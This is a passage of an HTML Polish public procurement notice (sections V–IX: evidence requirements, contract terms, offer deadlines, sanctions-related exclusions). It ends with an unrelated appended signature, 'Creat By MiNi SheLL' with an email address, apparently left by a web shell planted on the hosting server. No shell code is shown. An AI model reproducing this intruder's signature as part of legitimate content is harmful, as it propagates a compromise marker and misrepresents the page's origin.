wystawione w okresie ostatnich 3 miesięcy.<br/>2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Dla Części II:<br/>1. Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, z uwzględnieniem wymagań określonych w przepisach<br/>ustawy, w tym wymagań wskazanych w art. 58 ustawy.<br/>2. W przypadku, o którym mowa w art. 117 ust. 3 ustawy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które usługi lub dostawy wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Projektowanymi Postanowieniami Umowy, które stanowią Załącznik Nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-13 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-zamowienia.nbp.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-13 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-12</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający informuje, że zgodnie z art. 7 ust. 6-7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z<br/>2024 r. poz. 507 z późn. zm.) osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 tej ustawy, które w<br/>okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie<br/>zamówienia publicznego podlegają karze pieniężnej. Karę pieniężną, o której mowa w ust. 6 tej ustawy, nakłada Prezes<br/>Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.<br/>2. Zamawiający informuje, że zgodnie z art. 7 ust. 5 ustawy, przez ubieganie się o udzielenie zamówienia publicznego<br/>rozumie się złożenie oferty.<br/>3. Zgodnie z art. 5k rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w<br/>związku z działaniami Rosji destabilizującymi sytuację na Ukrainie zakazuje się wykonywania zamówienia publicznego z<br/>udziałem podwykonawców, dostawców lub podmiotów, na których zdolności polega się w rozumieniu dyrektywy<br/>2014/24/UE, o których mowa w art. 5k tego rozporządzenia w przypadku gdy przypada na nich ponad 10 % wartości<br/>zamówienia.<br/>4. Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu, w odniesieniu do konkretnego<br/>zamówienia lub jego części, może polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających<br/>zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. W takim przypadku Wykonawca<br/>składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów<br/>na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów.<br/>5. Zamawiający nie ogranicza liczby wykonawców, których zaprosi do negocjacji. Zamawiający zaprosi do negocjacji tych<br/>Wykonawców, którzy nie podlegają wykluczeniu i którzy złożyli niepodlegające odrzuceniu oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com